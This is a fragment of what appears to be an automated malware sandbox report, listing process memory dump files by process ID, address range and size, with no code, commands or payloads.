memory/4368-368-0x0000000006F33000-0x0000000006F34000-memory.dmpFilesize
4KB
-
memory/4368-369-0x00000000095A0000-0x00000000096A2000-memory.dmpFilesize
1.0MB
-
memory/4384-662-0x0000000140000000-mapping.dmp
-
memory/4536-529-0x0000000000000000-mapping.dmp
-
memory/4552-629-0x0000000000000000-mapping.dmp
-
memory/4656-607-0x0000000000000000-mapping.dmp
-
memory/4664-530-0x0000000000000000-mapping.dmp
-
memory/4696-373-0x0000000006B32000-0x0000000006B33000-memory.dmpFilesize
4KB
-
memory/4696-422-0x0000000006B33000-0x0000000006B34000-memory.dmpFilesize
4KB
-
memory/4696-372-0x0000000006B30000-0x0000000006B31000-memory.dmpFilesize
4KB
-
memory/4696-289-0x0000000000000000-mapping.dmp
-
memory/4700-579-0x0000000000000000-mapping.dmp
-
memory/4748-634-0x0000000000000000-mapping.dmp
-
memory/4884-322-0x0000000000000000-mapping.dmp
-
memory/4884-341-0x0000000005040000-0x0000000005041000-memory.dmpFilesize
4KB
-
memory/4888-647-0x0000000000417A8B-mapping.dmp
-
memory/4896-637-0x0000000000000000-mapping.dmp
-
memory/4900-342-0x0000000004E40000-0x0000000004E41000-memory.dmpFilesize
4KB
-
memory/4900-324-0x0000000000000000-mapping.dmp
-
memory/4964-653-0x0000000000417A8B-mapping.dmp
-
memory/4964-534-0x000000000043E9BE-mapping.dmp
-
memory/5032-620-0x0000000000000000-mapping.dmp
-
memory/5088-600-0x0000000000000000-mapping.dmp
-
memory/5100-571-0x0000000000000000-mapping.dmp